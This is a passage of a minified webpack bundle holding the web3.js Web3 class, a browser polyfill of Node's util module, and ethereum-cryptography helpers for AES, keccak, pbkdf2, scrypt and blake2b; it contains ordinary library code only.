                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                }, s = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3 = void 0;
                const a = r(6527), u = o(r(6637)), c = s(r(3211)), l = r(1698), d = s(r(9910)), h = s(r(9757)), f = s(r(9820)), p = o(r(9634)), m = r(9634), g = r(5071), y = s(r(9937)), v = r(1186), b = r(9913);
                class E extends a.Web3Context {
                    constructor(e){
                        super({
                            provider: e,
                            registeredSubscriptions: u.registeredSubscriptions
                        }), ((0, m.isNullish)(e) || "string" == typeof e && "" === e.trim()) && console.warn("NOTE: web3.js is running without provider. You need to pass a provider in order to interact with the network!");
                        const t = (0, v.initAccountsForContext)(this);
                        this._wallet = t.wallet, this._accountProvider = t, this.utils = p;
                        const r = this;
                        class n extends c.default {
                            constructor(e, t, n){
                                if ("object" == typeof t && "object" == typeof n) throw new g.InvalidMethodParamsError("Should not provide options at both 2nd and 3rd parameters");
                                if ((0, m.isNullish)(t)) super(e, n, r.getContextObject());
                                else if ("object" == typeof t) super(e, t, r.getContextObject());
                                else {
                                    if ("string" != typeof t) throw new g.InvalidMethodParamsError;
                                    super(e, t, null != n ? n : {}, r.getContextObject());
                                }
                                super.subscribeToContextEvents(r);
                            }
                        }
                        const i = r.use(u.default);
                        this.eth = Object.assign(i, {
                            ens: r.use(l.ENS, l.registryAddresses.main),
                            Iban: d.default,
                            net: r.use(f.default),
                            personal: r.use(h.default),
                            Contract: n,
                            abi: y.default,
                            accounts: t
                        });
                    }
                }
                t.Web3 = E, E.version = b.Web3PkgInfo.version, E.utils = p, E.modules = {
                    Web3Eth: u.default,
                    Iban: d.default,
                    Net: f.default,
                    ENS: l.ENS,
                    Personal: h.default
                }, t.default = E;
            },
            82: (e)=>{
                e.exports = function(e) {
                    return e && "object" == typeof e && "function" == typeof e.copy && "function" == typeof e.fill && "function" == typeof e.readUInt8;
                };
            },
            4895: (e, t, r)=>{
                "use strict";
                var n = r(2635), i = r(3138), o = r(2094), s = r(198);
                function a(e) {
                    return e.call.bind(e);
                }
                var u = "undefined" != typeof BigInt, c = "undefined" != typeof Symbol, l = a(Object.prototype.toString), d = a(Number.prototype.valueOf), h = a(String.prototype.valueOf), f = a(Boolean.prototype.valueOf);
                if (u) var p = a(BigInt.prototype.valueOf);
                if (c) var m = a(Symbol.prototype.valueOf);
                function g(e, t) {
                    if ("object" != typeof e) return !1;
                    try {
                        return t(e), !0;
                    } catch (e) {
                        return !1;
                    }
                }
                function y(e) {
                    return "[object Map]" === l(e);
                }
                function v(e) {
                    return "[object Set]" === l(e);
                }
                function b(e) {
                    return "[object WeakMap]" === l(e);
                }
                function E(e) {
                    return "[object WeakSet]" === l(e);
                }
                function A(e) {
                    return "[object ArrayBuffer]" === l(e);
                }
                function _(e) {
                    return "undefined" != typeof ArrayBuffer && (A.working ? A(e) : e instanceof ArrayBuffer);
                }
                function w(e) {
                    return "[object DataView]" === l(e);
                }
                function T(e) {
                    return "undefined" != typeof DataView && (w.working ? w(e) : e instanceof DataView);
                }
                t.isArgumentsObject = n, t.isGeneratorFunction = i, t.isTypedArray = s, t.isPromise = function(e) {
                    return "undefined" != typeof Promise && e instanceof Promise || null !== e && "object" == typeof e && "function" == typeof e.then && "function" == typeof e.catch;
                }, t.isArrayBufferView = function(e) {
                    return "undefined" != typeof ArrayBuffer && ArrayBuffer.isView ? ArrayBuffer.isView(e) : s(e) || T(e);
                }, t.isUint8Array = function(e) {
                    return "Uint8Array" === o(e);
                }, t.isUint8ClampedArray = function(e) {
                    return "Uint8ClampedArray" === o(e);
                }, t.isUint16Array = function(e) {
                    return "Uint16Array" === o(e);
                }, t.isUint32Array = function(e) {
                    return "Uint32Array" === o(e);
                }, t.isInt8Array = function(e) {
                    return "Int8Array" === o(e);
                }, t.isInt16Array = function(e) {
                    return "Int16Array" === o(e);
                }, t.isInt32Array = function(e) {
                    return "Int32Array" === o(e);
                }, t.isFloat32Array = function(e) {
                    return "Float32Array" === o(e);
                }, t.isFloat64Array = function(e) {
                    return "Float64Array" === o(e);
                }, t.isBigInt64Array = function(e) {
                    return "BigInt64Array" === o(e);
                }, t.isBigUint64Array = function(e) {
                    return "BigUint64Array" === o(e);
                }, y.working = "undefined" != typeof Map && y(new Map), t.isMap = function(e) {
                    return "undefined" != typeof Map && (y.working ? y(e) : e instanceof Map);
                }, v.working = "undefined" != typeof Set && v(new Set), t.isSet = function(e) {
                    return "undefined" != typeof Set && (v.working ? v(e) : e instanceof Set);
                }, b.working = "undefined" != typeof WeakMap && b(new WeakMap), t.isWeakMap = function(e) {
                    return "undefined" != typeof WeakMap && (b.working ? b(e) : e instanceof WeakMap);
                }, E.working = "undefined" != typeof WeakSet && E(new WeakSet), t.isWeakSet = function(e) {
                    return E(e);
                }, A.working = "undefined" != typeof ArrayBuffer && A(new ArrayBuffer), t.isArrayBuffer = _, w.working = "undefined" != typeof ArrayBuffer && "undefined" != typeof DataView && w(new DataView(new ArrayBuffer(1), 0, 1)), t.isDataView = T;
                var R = "undefined" != typeof SharedArrayBuffer ? SharedArrayBuffer : void 0;
                function I(e) {
                    return "[object SharedArrayBuffer]" === l(e);
                }
                function S(e) {
                    return void 0 !== R && (void 0 === I.working && (I.working = I(new R)), I.working ? I(e) : e instanceof R);
                }
                function P(e) {
                    return g(e, d);
                }
                function O(e) {
                    return g(e, h);
                }
                function x(e) {
                    return g(e, f);
                }
                function M(e) {
                    return u && g(e, p);
                }
                function B(e) {
                    return c && g(e, m);
                }
                t.isSharedArrayBuffer = S, t.isAsyncFunction = function(e) {
                    return "[object AsyncFunction]" === l(e);
                }, t.isMapIterator = function(e) {
                    return "[object Map Iterator]" === l(e);
                }, t.isSetIterator = function(e) {
                    return "[object Set Iterator]" === l(e);
                }, t.isGeneratorObject = function(e) {
                    return "[object Generator]" === l(e);
                }, t.isWebAssemblyCompiledModule = function(e) {
                    return "[object WebAssembly.Module]" === l(e);
                }, t.isNumberObject = P, t.isStringObject = O, t.isBooleanObject = x, t.isBigIntObject = M, t.isSymbolObject = B, t.isBoxedPrimitive = function(e) {
                    return P(e) || O(e) || x(e) || M(e) || B(e);
                }, t.isAnyArrayBuffer = function(e) {
                    return "undefined" != typeof Uint8Array && (_(e) || S(e));
                }, [
                    "isProxy",
                    "isExternal",
                    "isModuleNamespaceObject"
                ].forEach(function(e) {
                    Object.defineProperty(t, e, {
                        enumerable: !1,
                        value: function() {
                            throw new Error(e + " is not supported in userland");
                        }
                    });
                });
            },
            3335: (e, t, r)=>{
                var n = r(4406), i = Object.getOwnPropertyDescriptors || function(e) {
                    for(var t = Object.keys(e), r = {}, n = 0; n < t.length; n++)r[t[n]] = Object.getOwnPropertyDescriptor(e, t[n]);
                    return r;
                }, o = /%[sdj%]/g;
                t.format = function(e) {
                    if (!b(e)) {
                        for(var t = [], r = 0; r < arguments.length; r++)t.push(c(arguments[r]));
                        return t.join(" ");
                    }
                    r = 1;
                    for(var n = arguments, i = n.length, s = String(e).replace(o, function(e) {
                        if ("%%" === e) return "%";
                        if (r >= i) return e;
                        switch(e){
                            case "%s":
                                return String(n[r++]);
                            case "%d":
                                return Number(n[r++]);
                            case "%j":
                                try {
                                    return JSON.stringify(n[r++]);
                                } catch (e) {
                                    return "[Circular]";
                                }
                            default:
                                return e;
                        }
                    }), a = n[r]; r < i; a = n[++r])y(a) || !_(a) ? s += " " + a : s += " " + c(a);
                    return s;
                }, t.deprecate = function(e, r) {
                    if (void 0 !== n && !0 === n.noDeprecation) return e;
                    if (void 0 === n) return function() {
                        return t.deprecate(e, r).apply(this, arguments);
                    };
                    var i = !1;
                    return function() {
                        if (!i) {
                            if (n.throwDeprecation) throw new Error(r);
                            n.traceDeprecation ? console.trace(r) : console.error(r), i = !0;
                        }
                        return e.apply(this, arguments);
                    };
                };
                var s = {}, a = /^$/;
                if (n.env.NODE_DEBUG) {
                    var u = n.env.NODE_DEBUG;
                    u = u.replace(/[|\\{}()[\]^$+?.]/g, "\\$&").replace(/\*/g, ".*").replace(/,/g, "$|^").toUpperCase(), a = new RegExp("^" + u + "$", "i");
                }
                function c(e, r) {
                    var n = {
                        seen: [],
                        stylize: d
                    };
                    return arguments.length >= 3 && (n.depth = arguments[2]), arguments.length >= 4 && (n.colors = arguments[3]), g(r) ? n.showHidden = r : r && t._extend(n, r), E(n.showHidden) && (n.showHidden = !1), E(n.depth) && (n.depth = 2), E(n.colors) && (n.colors = !1), E(n.customInspect) && (n.customInspect = !0), n.colors && (n.stylize = l), h(n, e, n.depth);
                }
                function l(e, t) {
                    var r = c.styles[t];
                    return r ? "\x1b[" + c.colors[r][0] + "m" + e + "\x1b[" + c.colors[r][1] + "m" : e;
                }
                function d(e, t) {
                    return e;
                }
                function h(e, r, n) {
                    if (e.customInspect && r && R(r.inspect) && r.inspect !== t.inspect && (!r.constructor || r.constructor.prototype !== r)) {
                        var i = r.inspect(n, e);
                        return b(i) || (i = h(e, i, n)), i;
                    }
                    var o = function(e, t) {
                        if (E(t)) return e.stylize("undefined", "undefined");
                        if (b(t)) {
                            var r = "'" + JSON.stringify(t).replace(/^"|"$/g, "").replace(/'/g, "\\'").replace(/\\"/g, '"') + "'";
                            return e.stylize(r, "string");
                        }
                        return v(t) ? e.stylize("" + t, "number") : g(t) ? e.stylize("" + t, "boolean") : y(t) ? e.stylize("null", "null") : void 0;
                    }(e, r);
                    if (o) return o;
                    var s = Object.keys(r), a = function(e) {
                        var t = {};
                        return e.forEach(function(e, r) {
                            t[e] = !0;
                        }), t;
                    }(s);
                    if (e.showHidden && (s = Object.getOwnPropertyNames(r)), T(r) && (s.indexOf("message") >= 0 || s.indexOf("description") >= 0)) return f(r);
                    if (0 === s.length) {
                        if (R(r)) {
                            var u = r.name ? ": " + r.name : "";
                            return e.stylize("[Function" + u + "]", "special");
                        }
                        if (A(r)) return e.stylize(RegExp.prototype.toString.call(r), "regexp");
                        if (w(r)) return e.stylize(Date.prototype.toString.call(r), "date");
                        if (T(r)) return f(r);
                    }
                    var c, l = "", d = !1, _ = [
                        "{",
                        "}"
                    ];
                    return m(r) && (d = !0, _ = [
                        "[",
                        "]"
                    ]), R(r) && (l = " [Function" + (r.name ? ": " + r.name : "") + "]"), A(r) && (l = " " + RegExp.prototype.toString.call(r)), w(r) && (l = " " + Date.prototype.toUTCString.call(r)), T(r) && (l = " " + f(r)), 0 !== s.length || d && 0 != r.length ? n < 0 ? A(r) ? e.stylize(RegExp.prototype.toString.call(r), "regexp") : e.stylize("[Object]", "special") : (e.seen.push(r), c = d ? function(e, t, r, n, i) {
                        for(var o = [], s = 0, a = t.length; s < a; ++s)x(t, String(s)) ? o.push(p(e, t, r, n, String(s), !0)) : o.push("");
                        return i.forEach(function(i) {
                            i.match(/^\d+$/) || o.push(p(e, t, r, n, i, !0));
                        }), o;
                    }(e, r, n, a, s) : s.map(function(t) {
                        return p(e, r, n, a, t, d);
                    }), e.seen.pop(), function(e, t, r) {
                        return e.reduce(function(e, t) {
                            return t.indexOf("\n"), e + t.replace(/\u001b\[\d\d?m/g, "").length + 1;
                        }, 0) > 60 ? r[0] + ("" === t ? "" : t + "\n ") + " " + e.join(",\n  ") + " " + r[1] : r[0] + t + " " + e.join(", ") + " " + r[1];
                    }(c, l, _)) : _[0] + l + _[1];
                }
                function f(e) {
                    return "[" + Error.prototype.toString.call(e) + "]";
                }
                function p(e, t, r, n, i, o) {
                    var s, a, u;
                    if ((u = Object.getOwnPropertyDescriptor(t, i) || {
                        value: t[i]
                    }).get ? a = u.set ? e.stylize("[Getter/Setter]", "special") : e.stylize("[Getter]", "special") : u.set && (a = e.stylize("[Setter]", "special")), x(n, i) || (s = "[" + i + "]"), a || (e.seen.indexOf(u.value) < 0 ? (a = y(r) ? h(e, u.value, null) : h(e, u.value, r - 1)).indexOf("\n") > -1 && (a = o ? a.split("\n").map(function(e) {
                        return "  " + e;
                    }).join("\n").substr(2) : "\n" + a.split("\n").map(function(e) {
                        return "   " + e;
                    }).join("\n")) : a = e.stylize("[Circular]", "special")), E(s)) {
                        if (o && i.match(/^\d+$/)) return a;
                        (s = JSON.stringify("" + i)).match(/^"([a-zA-Z_][a-zA-Z_0-9]*)"$/) ? (s = s.substr(1, s.length - 2), s = e.stylize(s, "name")) : (s = s.replace(/'/g, "\\'").replace(/\\"/g, '"').replace(/(^"|"$)/g, "'"), s = e.stylize(s, "string"));
                    }
                    return s + ": " + a;
                }
                function m(e) {
                    return Array.isArray(e);
                }
                function g(e) {
                    return "boolean" == typeof e;
                }
                function y(e) {
                    return null === e;
                }
                function v(e) {
                    return "number" == typeof e;
                }
                function b(e) {
                    return "string" == typeof e;
                }
                function E(e) {
                    return void 0 === e;
                }
                function A(e) {
                    return _(e) && "[object RegExp]" === I(e);
                }
                function _(e) {
                    return "object" == typeof e && null !== e;
                }
                function w(e) {
                    return _(e) && "[object Date]" === I(e);
                }
                function T(e) {
                    return _(e) && ("[object Error]" === I(e) || e instanceof Error);
                }
                function R(e) {
                    return "function" == typeof e;
                }
                function I(e) {
                    return Object.prototype.toString.call(e);
                }
                function S(e) {
                    return e < 10 ? "0" + e.toString(10) : e.toString(10);
                }
                t.debuglog = function(e) {
                    if (e = e.toUpperCase(), !s[e]) {
                        if (a.test(e)) {
                            var r = n.pid;
                            s[e] = function() {
                                var n = t.format.apply(t, arguments);
                                console.error("%s %d: %s", e, r, n);
                            };
                        } else s[e] = function() {};
                    }
                    return s[e];
                }, t.inspect = c, c.colors = {
                    bold: [
                        1,
                        22
                    ],
                    italic: [
                        3,
                        23
                    ],
                    underline: [
                        4,
                        24
                    ],
                    inverse: [
                        7,
                        27
                    ],
                    white: [
                        37,
                        39
                    ],
                    grey: [
                        90,
                        39
                    ],
                    black: [
                        30,
                        39
                    ],
                    blue: [
                        34,
                        39
                    ],
                    cyan: [
                        36,
                        39
                    ],
                    green: [
                        32,
                        39
                    ],
                    magenta: [
                        35,
                        39
                    ],
                    red: [
                        31,
                        39
                    ],
                    yellow: [
                        33,
                        39
                    ]
                }, c.styles = {
                    special: "cyan",
                    number: "yellow",
                    boolean: "yellow",
                    undefined: "grey",
                    null: "bold",
                    string: "green",
                    date: "magenta",
                    regexp: "red"
                }, t.types = r(4895), t.isArray = m, t.isBoolean = g, t.isNull = y, t.isNullOrUndefined = function(e) {
                    return null == e;
                }, t.isNumber = v, t.isString = b, t.isSymbol = function(e) {
                    return "symbol" == typeof e;
                }, t.isUndefined = E, t.isRegExp = A, t.types.isRegExp = A, t.isObject = _, t.isDate = w, t.types.isDate = w, t.isError = T, t.types.isNativeError = T, t.isFunction = R, t.isPrimitive = function(e) {
                    return null === e || "boolean" == typeof e || "number" == typeof e || "string" == typeof e || "symbol" == typeof e || void 0 === e;
                }, t.isBuffer = r(82);
                var P = [
                    "Jan",
                    "Feb",
                    "Mar",
                    "Apr",
                    "May",
                    "Jun",
                    "Jul",
                    "Aug",
                    "Sep",
                    "Oct",
                    "Nov",
                    "Dec"
                ];
                function O() {
                    var e = new Date, t = [
                        S(e.getHours()),
                        S(e.getMinutes()),
                        S(e.getSeconds())
                    ].join(":");
                    return [
                        e.getDate(),
                        P[e.getMonth()],
                        t
                    ].join(" ");
                }
                function x(e, t) {
                    return Object.prototype.hasOwnProperty.call(e, t);
                }
                t.log = function() {
                    console.log("%s - %s", O(), t.format.apply(t, arguments));
                }, t.inherits = r(1285), t._extend = function(e, t) {
                    if (!t || !_(t)) return e;
                    for(var r = Object.keys(t), n = r.length; n--;)e[r[n]] = t[r[n]];
                    return e;
                };
                var M = "undefined" != typeof Symbol ? Symbol("util.promisify.custom") : void 0;
                function B(e, t) {
                    if (!e) {
                        var r = new Error("Promise was rejected with a falsy value");
                        r.reason = e, e = r;
                    }
                    return t(e);
                }
                t.promisify = function(e) {
                    if ("function" != typeof e) throw new TypeError('The "original" argument must be of type Function');
                    if (M && e[M]) {
                        var t;
                        if ("function" != typeof (t = e[M])) throw new TypeError('The "util.promisify.custom" argument must be of type Function');
                        return Object.defineProperty(t, M, {
                            value: t,
                            enumerable: !1,
                            writable: !1,
                            configurable: !0
                        }), t;
                    }
                    function t() {
                        for(var t, r, n = new Promise(function(e, n) {
                            t = e, r = n;
                        }), i = [], o = 0; o < arguments.length; o++)i.push(arguments[o]);
                        i.push(function(e, n) {
                            e ? r(e) : t(n);
                        });
                        try {
                            e.apply(this, i);
                        } catch (e) {
                            r(e);
                        }
                        return n;
                    }
                    return Object.setPrototypeOf(t, Object.getPrototypeOf(e)), M && Object.defineProperty(t, M, {
                        value: t,
                        enumerable: !1,
                        writable: !1,
                        configurable: !0
                    }), Object.defineProperties(t, i(e));
                }, t.promisify.custom = M, t.callbackify = function(e) {
                    if ("function" != typeof e) throw new TypeError('The "original" argument must be of type Function');
                    function t() {
                        for(var t = [], r = 0; r < arguments.length; r++)t.push(arguments[r]);
                        var i = t.pop();
                        if ("function" != typeof i) throw new TypeError("The last argument must be of type Function");
                        var o = this, s = function() {
                            return i.apply(o, arguments);
                        };
                        e.apply(this, t).then(function(e) {
                            n.nextTick(s.bind(null, null, e));
                        }, function(e) {
                            n.nextTick(B.bind(null, e, s));
                        });
                    }
                    return Object.setPrototypeOf(t, Object.getPrototypeOf(e)), Object.defineProperties(t, i(e)), t;
                };
            },
            2094: (e, t, r)=>{
                "use strict";
                var n = r(3243), i = r(2191), o = r(2680), s = o("Object.prototype.toString"), a = r(7226)(), u = "undefined" == typeof globalThis ? r.g : globalThis, c = i(), l = o("String.prototype.slice"), d = {}, h = r(9765), f = Object.getPrototypeOf;
                a && h && f && n(c, function(e) {
                    if ("function" == typeof u[e]) {
                        var t = new u[e];
                        if (Symbol.toStringTag in t) {
                            var r = f(t), n = h(r, Symbol.toStringTag);
                            if (!n) {
                                var i = f(r);
                                n = h(i, Symbol.toStringTag);
                            }
                            d[e] = n.get;
                        }
                    }
                });
                var p = r(198);
                e.exports = function(e) {
                    return !!p(e) && (a && Symbol.toStringTag in e ? function(e) {
                        var t = !1;
                        return n(d, function(r, n) {
                            if (!t) try {
                                var i = r.call(e);
                                i === n && (t = i);
                            } catch (e) {}
                        }), t;
                    }(e) : l(s(e), 8, -1));
                };
            },
            1960: (e)=>{
                e.exports = function() {
                    for(var e = {}, r = 0; r < arguments.length; r++){
                        var n = arguments[r];
                        for(var i in n)t.call(n, i) && (e[i] = n[i]);
                    }
                    return e;
                };
                var t = Object.prototype.hasOwnProperty;
            },
            3072: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decrypt = t.encrypt = void 0;
                const n = r(825), i = r(6540), o = {
                    web: n.crypto
                };
                function s(e, t, r) {
                    if (!r.startsWith("aes-")) throw new Error(`AES submodule doesn't support mode ${r}`);
                    if (16 !== t.length) throw new Error("AES: wrong IV length");
                    if (r.startsWith("aes-128") && 16 !== e.length || r.startsWith("aes-256") && 32 !== e.length) throw new Error("AES: wrong key length");
                }
                async function a(e, t, r) {
                    if (!o.web) throw new Error("Browser crypto not available.");
                    let n;
                    if ([
                        "aes-128-cbc",
                        "aes-256-cbc"
                    ].includes(e) && (n = "cbc"), [
                        "aes-128-ctr",
                        "aes-256-ctr"
                    ].includes(e) && (n = "ctr"), !n) throw new Error("AES: unsupported mode");
                    return [
                        await o.web.subtle.importKey("raw", t, {
                            name: `AES-${n.toUpperCase()}`,
                            length: 8 * t.length
                        }, !0, [
                            "encrypt",
                            "decrypt"
                        ]),
                        {
                            name: `aes-${n}`,
                            iv: r,
                            counter: r,
                            length: 128
                        }
                    ];
                }
                async function u(e, t, r, n = "aes-128-ctr", u = !0) {
                    if (s(t, r, n), o.web) {
                        const [i, s] = await a(n, t, r), c = await o.web.subtle.encrypt(s, i, e);
                        let l = new Uint8Array(c);
                        return u || "aes-cbc" !== s.name || e.length % 16 || (l = l.slice(0, -16)), l;
                    }
                    if (o.node) {
                        const s = o.node.createCipheriv(n, t, r);
                        return s.setAutoPadding(u), (0, i.concatBytes)(s.update(e), s.final());
                    }
                    throw new Error("The environment doesn't have AES module");
                }
                t.encrypt = u, t.decrypt = async function(e, t, r, n = "aes-128-ctr", c = !0) {
                    if (s(t, r, n), o.web) {
                        const [s, l] = await a(n, t, r);
                        if (!c && "aes-cbc" === l.name) {
                            const o = await async function(e, t, r, n) {
                                const i = e.slice(-16);
                                for(let e = 0; e < 16; e++)i[e] ^= 16 ^ r[e];
                                return (await u(i, t, r, n)).slice(0, 16);
                            }(e, t, r, n);
                            e = (0, i.concatBytes)(e, o);
                        }
                        const d = await o.web.subtle.decrypt(l, s, e), h = new Uint8Array(d);
                        if ("aes-cbc" === l.name) {
                            const o = await u(h, t, r, n);
                            if (!(0, i.equalsBytes)(o, e)) throw new Error("AES: wrong padding");
                        }
                        return h;
                    }
                    if (o.node) {
                        const s = o.node.createDecipheriv(n, t, r);
                        return s.setAutoPadding(c), (0, i.concatBytes)(s.update(e), s.final());
                    }
                    throw new Error("The environment doesn't have AES module");
                };
            },
            7423: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.keccak512 = t.keccak384 = t.keccak256 = t.keccak224 = void 0;
                const n = r(125), i = r(6540);
                t.keccak224 = (0, i.wrapHash)(n.keccak_224), t.keccak256 = (()=>{
                    const e = (0, i.wrapHash)(n.keccak_256);
                    return e.create = n.keccak_256.create, e;
                })(), t.keccak384 = (0, i.wrapHash)(n.keccak_384), t.keccak512 = (0, i.wrapHash)(n.keccak_512);
            },
            8109: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.pbkdf2Sync = t.pbkdf2 = void 0;
                const n = r(9179), i = r(6053), o = r(2540), s = r(6540);
                t.pbkdf2 = async function(e, t, r, a, u) {
                    if (![
                        "sha256",
                        "sha512"
                    ].includes(u)) throw new Error("Only sha256 and sha512 are supported");
                    return (0, s.assertBytes)(e), (0, s.assertBytes)(t), (0, n.pbkdf2Async)("sha256" === u ? i.sha256 : o.sha512, e, t, {
                        c: r,
                        dkLen: a
                    });
                }, t.pbkdf2Sync = function(e, t, r, a, u) {
                    if (![
                        "sha256",
                        "sha512"
                    ].includes(u)) throw new Error("Only sha256 and sha512 are supported");
                    return (0, s.assertBytes)(e), (0, s.assertBytes)(t), (0, n.pbkdf2)("sha256" === u ? i.sha256 : o.sha512, e, t, {
                        c: r,
                        dkLen: a
                    });
                };
            },
            7002: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.scryptSync = t.scrypt = void 0;
                const n = r(2739), i = r(6540);
                t.scrypt = async function(e, t, r, o, s, a, u) {
                    return (0, i.assertBytes)(e), (0, i.assertBytes)(t), (0, n.scryptAsync)(e, t, {
                        N: r,
                        r: s,
                        p: o,
                        dkLen: a,
                        onProgress: u
                    });
                }, t.scryptSync = function(e, t, r, o, s, a, u) {
                    return (0, i.assertBytes)(e), (0, i.assertBytes)(t), (0, n.scrypt)(e, t, {
                        N: r,
                        r: s,
                        p: o,
                        dkLen: a,
                        onProgress: u
                    });
                };
            },
            5473: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.secp256k1 = void 0;
                var n = r(8358);
                Object.defineProperty(t, "secp256k1", {
                    enumerable: !0,
                    get: function() {
                        return n.secp256k1;
                    }
                });
            },
            6540: function(e, t, r) {
                "use strict";
                e = r.nmd(e);
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.crypto = t.wrapHash = t.equalsBytes = t.hexToBytes = t.bytesToUtf8 = t.utf8ToBytes = t.createView = t.concatBytes = t.toHex = t.bytesToHex = t.assertBytes = t.assertBool = void 0;
                const i = n(r(3525)), o = r(64), s = i.default.bool;
                t.assertBool = s;
                const a = i.default.bytes;
                t.assertBytes = a;
                var u = r(64);
                Object.defineProperty(t, "bytesToHex", {
                    enumerable: !0,
                    get: function() {
                        return u.bytesToHex;
                    }
                }), Object.defineProperty(t, "toHex", {
                    enumerable: !0,
                    get: function() {
                        return u.bytesToHex;
                    }
                }), Object.defineProperty(t, "concatBytes", {
                    enumerable: !0,
                    get: function() {
                        return u.concatBytes;
                    }
                }), Object.defineProperty(t, "createView", {
                    enumerable: !0,
                    get: function() {
                        return u.createView;
                    }
                }), Object.defineProperty(t, "utf8ToBytes", {
                    enumerable: !0,
                    get: function() {
                        return u.utf8ToBytes;
                    }
                }), t.bytesToUtf8 = function(e) {
                    if (!(e instanceof Uint8Array)) throw new TypeError("bytesToUtf8 expected Uint8Array, got " + typeof e);
                    return (new TextDecoder).decode(e);
                }, t.hexToBytes = function(e) {
                    const t = e.startsWith("0x") ? e.substring(2) : e;
                    return (0, o.hexToBytes)(t);
                }, t.equalsBytes = function(e, t) {
                    if (e.length !== t.length) return !1;
                    for(let r = 0; r < e.length; r++)if (e[r] !== t[r]) return !1;
                    return !0;
                }, t.wrapHash = function(e) {
                    return (t)=>(i.default.bytes(t), e(t));
                }, t.crypto = (()=>{
                    const t = "object" == typeof self && "crypto" in self ? self.crypto : void 0, r = "function" == typeof e.require && e.require.bind(e);
                    return {
                        node: r && !t ? r("crypto") : void 0,
                        web: t
                    };
                })();
            },
            3687: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.keccak512 = t.keccak384 = t.keccak256 = t.keccak224 = void 0;
                const n = r(125), i = r(5487);
                t.keccak224 = (0, i.wrapHash)(n.keccak_224), t.keccak256 = (()=>{
                    const e = (0, i.wrapHash)(n.keccak_256);
                    return e.create = n.keccak_256.create, e;
                })(), t.keccak384 = (0, i.wrapHash)(n.keccak_384), t.keccak512 = (0, i.wrapHash)(n.keccak_512);
            },
            1341: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getRandomBytes = t.getRandomBytesSync = void 0;
                const n = r(64);
                t.getRandomBytesSync = function(e) {
                    return (0, n.randomBytes)(e);
                }, t.getRandomBytes = async function(e) {
                    return (0, n.randomBytes)(e);
                };
            },
            5487: function(e, t, r) {
                "use strict";
                e = r.nmd(e);
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.crypto = t.wrapHash = t.equalsBytes = t.hexToBytes = t.bytesToUtf8 = t.utf8ToBytes = t.createView = t.concatBytes = t.toHex = t.bytesToHex = t.assertBytes = t.assertBool = void 0;
                const i = n(r(3525)), o = r(64), s = i.default.bool;
                t.assertBool = s;
                const a = i.default.bytes;
                t.assertBytes = a;
                var u = r(64);
                Object.defineProperty(t, "bytesToHex", {
                    enumerable: !0,
                    get: function() {
                        return u.bytesToHex;
                    }
                }), Object.defineProperty(t, "toHex", {
                    enumerable: !0,
                    get: function() {
                        return u.bytesToHex;
                    }
                }), Object.defineProperty(t, "concatBytes", {
                    enumerable: !0,
                    get: function() {
                        return u.concatBytes;
                    }
                }), Object.defineProperty(t, "createView", {
                    enumerable: !0,
                    get: function() {
                        return u.createView;
                    }
                }), Object.defineProperty(t, "utf8ToBytes", {
                    enumerable: !0,
                    get: function() {
                        return u.utf8ToBytes;
                    }
                }), t.bytesToUtf8 = function(e) {
                    if (!(e instanceof Uint8Array)) throw new TypeError("bytesToUtf8 expected Uint8Array, got " + typeof e);
                    return (new TextDecoder).decode(e);
                }, t.hexToBytes = function(e) {
                    const t = e.startsWith("0x") ? e.substring(2) : e;
                    return (0, o.hexToBytes)(t);
                }, t.equalsBytes = function(e, t) {
                    if (e.length !== t.length) return !1;
                    for(let r = 0; r < e.length; r++)if (e[r] !== t[r]) return !1;
                    return !0;
                }, t.wrapHash = function(e) {
                    return (t)=>(i.default.bytes(t), e(t));
                }, t.crypto = (()=>{
                    const t = "object" == typeof self && "crypto" in self ? self.crypto : void 0, r = "function" == typeof e.require && e.require.bind(e);
                    return {
                        node: r && !t ? r("crypto") : void 0,
                        web: t
                    };
                })();
            },
            7640: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.blake2b = void 0;
                const n = r(3806), i = r(7737);
                t.blake2b = (e, t = 64)=>{
                    if ((0, i.assertBytes)(e), t <= 0 || t > 64) throw Error("Invalid outputLength");
                    return (0, n.blake2b)(e, {
                        dkLen: t
                    });
                };
            },
            4488: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.keccak512 = t.keccak384 = t.keccak256 = t.keccak224 = void 0;
                const n = r(125), i = r(7737);
                t.keccak224 = (0, i.wrapHash)(n.keccak_224), t.keccak256 = (()=>{
                    const e = (0, i.wrapHash)(n.keccak_256);
                    return e.create = n.keccak_256.create, e;
                })(), t.keccak384 = (0, i.wrapHash)(n.keccak_384), t.keccak512 = (0, i.wrapHash)(n.keccak_512);
            },
            7737: function(e, t, r) {
                "use strict";
                e = r.nmd(e);
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.crypto = t.wrapHash = t.equalsBytes = t.hexToBytes = t.bytesToUtf8 = t.utf8ToBytes = t.createView = t.concatBytes = t.toHex = t.bytesToHex = t.assertBytes = t.assertBool = void 0;
                const i = n(r(3525)), o = r(64), s = i.default.bool;
                t.assertBool = s;
                const a = i.default.bytes;
                t.assertBytes = a;
                var u = r(64);
